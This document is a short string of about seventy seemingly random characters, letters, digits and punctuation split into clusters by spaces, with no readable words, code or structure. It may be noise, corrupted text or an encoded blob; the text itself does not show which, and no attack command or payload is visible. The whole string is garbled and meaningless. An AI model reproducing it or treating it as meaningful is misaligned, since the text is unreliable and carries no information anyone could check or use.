!Yb>ANQ YBDffM "yGCG^| >=Yt1j Y `).z za.(uLA^] Z~c}iGm ZfVK{!0G zwCsiJP